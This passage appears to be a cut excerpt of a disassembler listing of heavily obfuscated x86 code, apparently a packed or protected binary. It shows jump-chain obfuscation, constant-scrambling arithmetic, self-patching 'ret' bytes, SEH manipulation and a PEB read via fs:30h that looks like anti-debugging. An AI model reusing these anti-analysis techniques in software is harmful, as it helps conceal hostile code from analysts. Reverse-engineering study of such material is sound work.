loc_448405: ; CODE XREF: ut7h7i2x:00448EACj
jmp loc_451EB5
; ---------------------------------------------------------------------------
or eax, 0B3AA5A2Dh
and eax, ebp
jmp sub_44102C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C20D
loc_448417: ; CODE XREF: sub_44C20D:loc_450A75j
jnz loc_43E922
jmp loc_44CD5B
; END OF FUNCTION CHUNK FOR sub_44C20D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_259. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447928
loc_448423: ; CODE XREF: sub_447928-E602j
jmp loc_446C5B
; END OF FUNCTION CHUNK FOR sub_447928
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_448428: ; CODE XREF: sub_4445DC-5C80j
mov eax, [ebp+var_4]
mov al, [eax]
jo loc_45A46B
sub al, 99h
mov edx, [ebp+var_4]
jmp loc_457B4F
; END OF FUNCTION CHUNK FOR sub_4445DC
; ---------------------------------------------------------------------------
loc_44843D: ; CODE XREF: ut7h7i2x:004449BAj
js loc_448FC4
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_448443: ; CODE XREF: sub_446F9A:loc_454FF3j
rol eax, 1
cmp eax, 0D37C171Fh
jmp loc_453E99
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
loc_448450: ; CODE XREF: ut7h7i2x:0045929Bj
push edi
; START OF FUNCTION CHUNK FOR sub_43A556
loc_448451: ; CODE XREF: sub_43A556+1ED2Dj
xor eax, 0C024EEA8h
add eax, ebp
add eax, 5FF69244h
push eax
call sub_445416
jmp loc_44C334
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A32D
loc_44846A: ; CODE XREF: sub_45A32D-BEA0j
jnz loc_44B3F7
jmp loc_44C344
; END OF FUNCTION CHUNK FOR sub_45A32D
; ---------------------------------------------------------------------------
sbb esi, eax
jmp loc_442C69
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7B6
loc_44847C: ; CODE XREF: sub_43F7B6-5450j
cmp byte ptr [eax], 0
jnz loc_44FA31
push offset loc_454950
jmp loc_458DC0
; END OF FUNCTION CHUNK FOR sub_43F7B6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44848F: ; CODE XREF: sub_43CCC3:loc_4571EEj
pop esi
push 67EAA927h
pop eax
sub eax, 31E14C06h
and eax, 5F2744BCh
sub eax, 5DEE458Eh
jmp loc_45A93A
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
loc_4484AD: ; CODE XREF: ut7h7i2x:0043F951j
jo loc_453CA7
cmp edx, ebx
and eax, edx
mov edx, 0B79AA829h
jmp loc_4585D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443FC3
loc_4484C1: ; CODE XREF: sub_443FC3+129Fj
add ecx, 267CA0E8h
; END OF FUNCTION CHUNK FOR sub_443FC3
; START OF FUNCTION CHUNK FOR sub_439B67
loc_4484C7: ; CODE XREF: sub_447CBE-D818j
; sub_43AE1A+6j ...
jmp loc_44771B
; END OF FUNCTION CHUNK FOR sub_439B67
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_4484CC: ; CODE XREF: sub_443FC3:loc_44B31Cj
; sub_447CBE+57FAj
xchg edi, [esp+4+var_4]
mov ecx, edi
pop edi
call sub_449F12
loc_4484D7: ; CODE XREF: ut7h7i2x:00450B23j
; sub_458CD2:loc_457D71j ...
mov eax, 120h
call sub_4448AF
jmp loc_4425EF
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
mov dword ptr [ebp-8], 1
jmp loc_44AB6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4484F2: ; CODE XREF: sub_439BF8:loc_440F18j
; sub_439BF8+C0A3j ...
mov eax, [ebp-10h]
push eax
push ebp
mov ebp, eax
jmp loc_43DB9E
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_4484FE: ; CODE XREF: sub_44DF79-DF58j
call sub_441894
; END OF FUNCTION CHUNK FOR sub_44DF79
; =============== S U B R O U T I N E =======================================
sub_448503 proc near ; CODE XREF: sub_44600A+3p
; sub_43DBEC+9B1Fj
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00441BF4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004589A4 SIZE 0000001C BYTES
xchg esi, [esp+0]
pop esi
xchg ebp, [esp-4+arg_0]
push ebx
push 226BAB19h
pop ebx
jmp loc_441BF4
sub_448503 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_464. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_448517: ; CODE XREF: sub_4508DB-FC4Fj
jmp loc_442BD4
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455E0B
loc_44851C: ; CODE XREF: sub_455E0B-1AC54j
jmp loc_45916F
; END OF FUNCTION CHUNK FOR sub_455E0B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_550. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4555CE
loc_448522: ; CODE XREF: sub_4555CE+4393j
jmp loc_45918F
; END OF FUNCTION CHUNK FOR sub_4555CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4576A2
loc_448527: ; CODE XREF: sub_4576A2+3j
jmp loc_440FA9
; END OF FUNCTION CHUNK FOR sub_4576A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455C28
loc_44852C: ; CODE XREF: sub_455C28+20j
jmp loc_44FF9A
; END OF FUNCTION CHUNK FOR sub_455C28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455111
loc_448531: ; CODE XREF: sub_455111+11j
jmp loc_44A6D6
; END OF FUNCTION CHUNK FOR sub_455111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439C85
loc_448536: ; CODE XREF: sub_439C85+11j
jmp loc_447977
; END OF FUNCTION CHUNK FOR sub_439C85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_44853B: ; CODE XREF: sub_44F43B-20E4j
or edx, 78D223D1h
popf
jmp loc_450D62
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
loc_448547: ; CODE XREF: ut7h7i2x:loc_4499C3j
cmp ecx, ebp
jmp loc_440F60
; ---------------------------------------------------------------------------
loc_44854E: ; CODE XREF: ut7h7i2x:00445C4Dj
test edx, esi
jmp loc_451BC1
; ---------------------------------------------------------------------------
loc_448555: ; CODE XREF: ut7h7i2x:loc_44CA15j
; ut7h7i2x:00453963j
shl eax, 7
mov edx, [ebp+8]
mov edx, [edx-8]
or edx, 40h
jmp loc_451C07
; ---------------------------------------------------------------------------
loc_448566: ; CODE XREF: ut7h7i2x:0043FF60j
xchg ebp, [ecx]
; =============== S U B R O U T I N E =======================================
sub_448568 proc near ; CODE XREF: sub_458CD2-83E0p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004444B4 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
add eax, 748FD294h
xchg eax, [esp-4+arg_0]
jmp loc_4444B4
sub_448568 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub edx, eax
jmp loc_44A6AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_448581: ; CODE XREF: sub_43FF65+6A2Cj
; sub_4549F0:loc_44F9F7j
jbe loc_4575D4
and ebx, eax
jmp loc_444351
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
mov eax, 2D912001h
call sub_43AA94
mov ds:dword_41D14C, eax
lea eax, nullsub_2
call sub_4574D3
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_4485A9: ; CODE XREF: sub_450FDE-16906j
jmp loc_45328E
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_4485AE: ; CODE XREF: sub_4442CC+117D2j
pop edx
sub edx, 0F30330C7h
xor edx, 16498746h
xor eax, edx
pop edx
push ebx
jmp loc_456C17
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449406
loc_4485C4: ; CODE XREF: sub_449406+21F4j
pop edx
lea eax, nullsub_452
mov byte ptr [eax], 0C3h
jmp loc_4471B7
; END OF FUNCTION CHUNK FOR sub_449406
; ---------------------------------------------------------------------------
xchg esi, [esp]
mov edx, esi
pop esi
jmp loc_446340
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_4485DE: ; CODE XREF: sub_452B14-18720j
; ut7h7i2x:00440C12j
or edx, 0AAE68137h
xor edx, 17E3EE45h
xor eax, edx
pop edx
rol eax, 1Dh
push edi
push 32D3C5F8h
jmp loc_43FF04
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
loc_4485FB: ; CODE XREF: ut7h7i2x:loc_43BB56j
jz loc_4393CB
xchg ebx, [edi]
sub ecx, ebp
cmp ecx, 0DC15AD83h
jmp loc_43A64A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F300
loc_448610: ; CODE XREF: sub_44F300+Dj
rol esi, 0Ch
and esi, 63EBDCB0h
or esi, 0C4547698h
add esi, 21A744DFh
add eax, esi
pop esi
mov eax, [eax]
pushf
jmp loc_45110C
; END OF FUNCTION CHUNK FOR sub_44F300
; =============== S U B R O U T I N E =======================================
sub_448630 proc near ; CODE XREF: ut7h7i2x:004415AFp
; ut7h7i2x:004441EEj
; FUNCTION CHUNK AT 00445898 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00448D49 SIZE 00000006 BYTES
xchg ebx, [esp+0]
pop ebx
mov ebp, esp
push edx
mov edx, ecx
xchg edx, [esp+0]
jmp loc_445898
sub_448630 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B452
loc_448641: ; CODE XREF: sub_44B452:loc_43BFF1j
push eax
call sub_454196
retn
; END OF FUNCTION CHUNK FOR sub_44B452
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B5D4
loc_448648: ; CODE XREF: sub_44C273:loc_43CBA8j
; sub_43B5D4+1EBC9j
jmp loc_4397C4
; END OF FUNCTION CHUNK FOR sub_43B5D4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_44864D: ; CODE XREF: sub_44D1F0-10417j
jmp loc_43F3FD
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_448652: ; CODE XREF: sub_439AE7:loc_453FF1j
push edi
mov edi, ebp
xchg edi, [esp+4+var_4]
jmp loc_43EA7C
; END OF FUNCTION CHUNK FOR sub_439AE7
; =============== S U B R O U T I N E =======================================
sub_44865D proc near ; CODE XREF: ut7h7i2x:004450E1j
; sub_439BD1+C2E8p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004391DB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00439216 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439F35 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043AEBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B7DD SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043BFA3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D39B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043EA9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F9E9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00440469 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440E17 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00441577 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00441A33 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441B48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442716 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004446DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444CE0 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00446656 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447154 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044728B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004473D8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00448C3A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00449461 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00449E63 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B9DB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D624 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004526DF SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00452A64 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00452B57 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00456C31 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045ADC8 SIZE 0000000E BYTES
xchg esi, [esp+0]
pop esi
call sub_44DB3E
test eax, eax
jz loc_456C31
jmp loc_449E63
sub_44865D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov ds:dword_41D05C, eax
lea eax, nullsub_442
mov byte ptr [eax], 0C3h
jmp loc_44C395
; ---------------------------------------------------------------------------
loc_448687: ; CODE XREF: ut7h7i2x:0044CE6Dj
mov eax, [esp]
jmp loc_456322
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_44868F: ; CODE XREF: sub_44E5AB:loc_43A81Bj
mov esi, edx
xchg esi, [esp+8+var_8]
nop
push 0BDD53F2h
xchg ecx, [esp+0Ch+var_C]
loc_44869D: ; CODE XREF: ut7h7i2x:00443C5Fj
jmp loc_45599E
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
push ebx
push 992FCE60h
pop ebx
rol ebx, 0Ch
add ebx, 35BC75Eh
jmp loc_457A61
; ---------------------------------------------------------------------------
loc_4486B7: ; DATA XREF: sub_44064B-6F9Co
cmp dword ptr [ebp-10h], 0
jnz loc_456A7C
mov eax, [ebp+8]
push eax
cmp dword ptr [ebp-14h], 5
setz al
call sub_45A2AD
jmp loc_4482A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_4486D6: ; CODE XREF: sub_44092D:loc_451B89j
; ut7h7i2x:00451BA0j
xor esi, 0E9F9A069h
add esi, 0F6E406FBh
xchg esi, [esp+4+var_4]
jmp loc_43A580
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
loc_4486EA: ; CODE XREF: ut7h7i2x:0043D6BBj
pushf
; START OF FUNCTION CHUNK FOR sub_4523B3
loc_4486EB: ; CODE XREF: sub_4523B3:loc_43D6A3j
xor ebx, 989125E6h
add ebx, ebp
add ebx, 23429372h
loc_4486F9: ; CODE XREF: sub_44C852+D808j
jmp loc_44D7E5
; END OF FUNCTION CHUNK FOR sub_4523B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454A2B
loc_4486FE: ; CODE XREF: sub_454A2B:loc_44B6DBj
mov eax, [esp+0]
push edx
call sub_444E04
mov eax, 276E7523h
call sub_43AA94
push edx
push 2FBFD28Ah
xchg eax, [esp+4+var_4]
jmp loc_43BBCF
; END OF FUNCTION CHUNK FOR sub_454A2B
; =============== S U B R O U T I N E =======================================
sub_44871F proc near ; CODE XREF: sub_45ADF0-1E46Dj
; FUNCTION CHUNK AT 0043FF1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444524 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447AF3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A5FD SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00455572 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045909B SIZE 00000006 BYTES
push ebx
adc ecx, eax
mov [esi], eax
ja loc_444524
jmp loc_45909B
sub_44871F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_44872F: ; CODE XREF: sub_444273+151F7j
jge loc_44C935
pop edi
loc_448736: ; CODE XREF: ut7h7i2x:00448EE9j
or edx, 51E5254Ch
cmp edx, 9B3C1242h
jmp loc_45158A
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BDF1
loc_448747: ; CODE XREF: sub_44BDF1-10088j
jnz loc_442034
; END OF FUNCTION CHUNK FOR sub_44BDF1
; START OF FUNCTION CHUNK FOR sub_448321
loc_44874D: ; CODE XREF: sub_448321+7B2j
jmp loc_45080A
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
mov [esi], ecx
cmp ecx, 8606FDE2h
jmp loc_445011
; =============== S U B R O U T I N E =======================================
sub_44875F proc near ; CODE XREF: sub_43D797p
; ut7h7i2x:00447F7Dj
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004404B4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044173F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441D6C SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00446D71 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A0F8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044F53E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045404E SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
jnz sub_44F738
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_45404E
sub_44875F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_448774: ; CODE XREF: sub_44EC11-F6Bj
jz loc_43968C
loc_44877A: ; CODE XREF: sub_453E14+FF3j
jmp loc_440695
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
xchg ebx, [ebp+0]
jmp loc_439686
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4464B7
loc_448787: ; CODE XREF: ut7h7i2x:0043D886j
; sub_4464B7:loc_44EFDEj
and eax, edx
; END OF FUNCTION CHUNK FOR sub_4464B7
; =============== S U B R O U T I N E =======================================
sub_448789 proc near ; CODE XREF: ut7h7i2x:00459649p
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
add ebx, 8B843A81h
xchg ebx, [esp-4+arg_0]
jmp sub_43AA94
sub_448789 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44879B proc near ; CODE XREF: ut7h7i2x:0045840Ej
; DATA XREF: sub_44B58F+7o
var_4 = dword ptr -4
push ebx
push edx
pop ebx
xchg ebx, [esp+4+var_4]
call sub_4589FE
mov eax, 1F1D4A60h
jmp sub_455383
sub_44879B endp
; =============== S U B R O U T I N E =======================================
sub_4487B0 proc near ; DATA XREF: sub_449808:loc_442C3Eo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004451D5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E55A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455895 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456982 SIZE 00000015 BYTES
push ebx
push 6BE3687Ah
add ebx, 0CAD474AFh
jmp loc_456982
sub_4487B0 endp
; ---------------------------------------------------------------------------
db 0EAh, 0D0h, 88h
dword_4487C4 dd 75Ch ; DATA XREF: sub_44FDF2-6CB8r
; ut7h7i2x:004517C4w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45AA08
loc_4487C8: ; CODE XREF: sub_45AA08+15j
jmp nullsub_466
; END OF FUNCTION CHUNK FOR sub_45AA08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45633E
loc_4487CD: ; CODE XREF: sub_45633E:loc_4412CBj
jmp loc_43F31B
; END OF FUNCTION CHUNK FOR sub_45633E
; ---------------------------------------------------------------------------
dw 133h
dword_4487D4 dd 9DDF51D8h ; DATA XREF: sub_439788+1C4CCw
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_4487D8: ; CODE XREF: sub_44B5CF+9004j
jmp loc_43F921
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_4487DD: ; CODE XREF: sub_4455F4-4FCEj
jmp loc_445793
; END OF FUNCTION CHUNK FOR sub_4455F4
; ---------------------------------------------------------------------------
dw 0A26Dh
dword_4487E4 dd 8065677Eh ; DATA XREF: ut7h7i2x:loc_44C3CEw
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440493
loc_4487E8: ; CODE XREF: sub_440493-639Dj
jmp nullsub_150
; END OF FUNCTION CHUNK FOR sub_440493
; ---------------------------------------------------------------------------
db 22h, 0FCh, 0A9h
dword_4487F0 dd 153970h ; DATA XREF: sub_442B3B-5F42r
; ut7h7i2x:loc_445D77r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_4487F4: ; CODE XREF: sub_446F56-8504j
jmp sub_4448AF
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
db 0A7h, 6Ch, 96h
dword_4487FC dd 0BCB1BBF3h ; DATA XREF: sub_450DB3-BDFFr
; sub_450DA8w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CD08
loc_448800: ; CODE XREF: sub_45A32D-1CB29j
; sub_43CD08+17A8Dj
jmp loc_44554B
; END OF FUNCTION CHUNK FOR sub_43CD08
; ---------------------------------------------------------------------------
loc_448805: ; CODE XREF: ut7h7i2x:0043B568j
jmp locret_454659
; ---------------------------------------------------------------------------
dw 99E0h
dword_44880C dd 0 ; DATA XREF: ut7h7i2x:0043A9BDr
; sub_43D989+5EF8r ...
; ---------------------------------------------------------------------------
push 0B39AA24Ah
pop eax
sub eax, 33F30D3Bh
add eax, 1A0A7841h
jmp loc_458ADC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_448827: ; CODE XREF: sub_4462B0+13324j
jz loc_451819
jmp loc_44B155
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
jo loc_43DA3A
jmp sub_455DCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CDBA
loc_44883D: ; CODE XREF: sub_43CDBA+5A71j
popf
loc_44883E: ; CODE XREF: sub_43C413:loc_45A963j
call sub_453D8B
mov edx, 0DD960900h
push edx
push 91C85EEEh
pop edx
xor edx, 950592E9h
jmp loc_4422FD
; END OF FUNCTION CHUNK FOR sub_43CDBA
; ---------------------------------------------------------------------------
rol edx, 1Ah
jmp sub_44D807
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_322. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_448863: ; CODE XREF: sub_455060+4588j
jmp loc_45445B
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_448868: ; CODE XREF: sub_44937E+Aj
jmp loc_439590
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
mov ds:dword_41D0A0, eax
lea eax, nullsub_538
call sub_43BECE
; START OF FUNCTION CHUNK FOR sub_4588BA
loc_44887E: ; CODE XREF: sub_4588BA+12j
jmp loc_445F86
; END OF FUNCTION CHUNK FOR sub_4588BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_448883: ; CODE XREF: sub_446320j
mov eax, ds:dword_43EECC
or eax, eax
jnz loc_44C52C
jmp loc_43D069
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_448896: ; CODE XREF: sub_44081E-6BB3j
mov eax, ebp
jz loc_44E90B
jmp loc_441F49
; END OF FUNCTION CHUNK FOR sub_44081E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_4488A3: ; CODE XREF: sub_43B9B1:loc_454070j
cmp dword ptr [ebp-4], 3
jnz loc_441F49
jmp loc_45964E
; END OF FUNCTION CHUNK FOR sub_43B9B1
; ---------------------------------------------------------------------------
cdq
jmp sub_45A3F9
; ---------------------------------------------------------------------------
sub eax, 0EF82E941h
jmp loc_43D17D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD56
loc_4488C3: ; CODE XREF: sub_44DD56:loc_4441BBj
; ut7h7i2x:00457259j
jnz loc_4395AE
test edi, ebp
jmp loc_4459BC
; END OF FUNCTION CHUNK FOR sub_44DD56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459111
loc_4488D0: ; CODE XREF: sub_459111:loc_459116j
jnz loc_43C350
jmp loc_44686B
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455111
loc_4488DB: ; CODE XREF: sub_455111-F7F3j
add esi, 42C43664h
jmp loc_454E0C
; END OF FUNCTION CHUNK FOR sub_455111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CC1E
loc_4488E6: ; CODE XREF: sub_44CC1E+1Bj
add eax, 0BC2C713Ah
xor eax, ds:4000F4h
and eax, 8A2DF981h
xor eax, 224D151h
call sub_4448AF
jmp loc_44EF13
; END OF FUNCTION CHUNK FOR sub_44CC1E
; ---------------------------------------------------------------------------
pop large dword ptr fs:0
add esp, 4
jmp loc_4549CA
; ---------------------------------------------------------------------------
loc_448917: ; CODE XREF: ut7h7i2x:004402FDj
test edi, ebp
jmp loc_45263F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F66D
loc_44891E: ; CODE XREF: sub_43F66D:loc_445DFDj
; sub_43F66D+679Bj
or ecx, 3EEB2BCBh
xor ecx, 0B988D5F9h
rol ecx, 11h
test ecx, 1000h
jmp loc_4534ED
; END OF FUNCTION CHUNK FOR sub_43F66D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_448938: ; CODE XREF: sub_43C0DA+FADj
jz loc_44254D
; END OF FUNCTION CHUNK FOR sub_43C0DA
; START OF FUNCTION CHUNK FOR sub_44C595
loc_44893E: ; CODE XREF: sub_44C595+1Bj
jmp loc_443936
; END OF FUNCTION CHUNK FOR sub_44C595
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450645
loc_448943: ; CODE XREF: sub_450645-A5FEj
jmp nullsub_166
; END OF FUNCTION CHUNK FOR sub_450645
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_448948: ; CODE XREF: sub_44081E+Aj
jmp loc_45409D
; END OF FUNCTION CHUNK FOR sub_44081E
; ---------------------------------------------------------------------------
db 87h, 0D3h, 0F7h
; ---------------------------------------------------------------------------
retn 0BB1Eh
; ---------------------------------------------------------------------------
db 69h
dd 9BE2E9FBh, 0B4E9FFFFh
db 5Ah, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446599
loc_44895F: ; CODE XREF: sub_446599:loc_43A089j
jb loc_43EB54
mov eax, large fs:30h
push esi
mov esi, edi
xchg esi, [esp+4+var_4]
push 1C37219Ah
jmp loc_452357
; END OF FUNCTION CHUNK FOR sub_446599
; ---------------------------------------------------------------------------
loc_44897C: ; DATA XREF: sub_457A66-1AE82o
mov edx, [ebp-4]
loc_44897F: ; CODE XREF: ut7h7i2x:loc_449117j
imul byte ptr [edx]
cmp al, 0A4h
jz loc_43D86D
loc_448989: ; CODE XREF: ut7h7i2x:loc_4556EDj
jmp loc_450C54
; ---------------------------------------------------------------------------
loc_44898E: ; CODE XREF: ut7h7i2x:0044238Ej
cdq
loc_44898F: ; CODE XREF: ut7h7i2x:loc_44A8F4j
push edx
mov edx, eax
xchg edx, [esp]
lea eax, loc_4396E8
push ebx
jmp loc_443278
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_4489A1: ; CODE XREF: sub_44D1F0-4F05j
jnz nullsub_55
add edx, ecx
mov [esi], ecx
shr edx, 0Dh
loc_4489AE: ; CODE XREF: ut7h7i2x:loc_43CDDEj
push eax
jmp loc_4394F7
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1E5
loc_4489B4: ; CODE XREF: sub_43C1E5+D849j
jnz loc_43D950
loc_4489BA: ; CODE XREF: ut7h7i2x:00459EDAj
jmp nullsub_532
; END OF FUNCTION CHUNK FOR sub_43C1E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
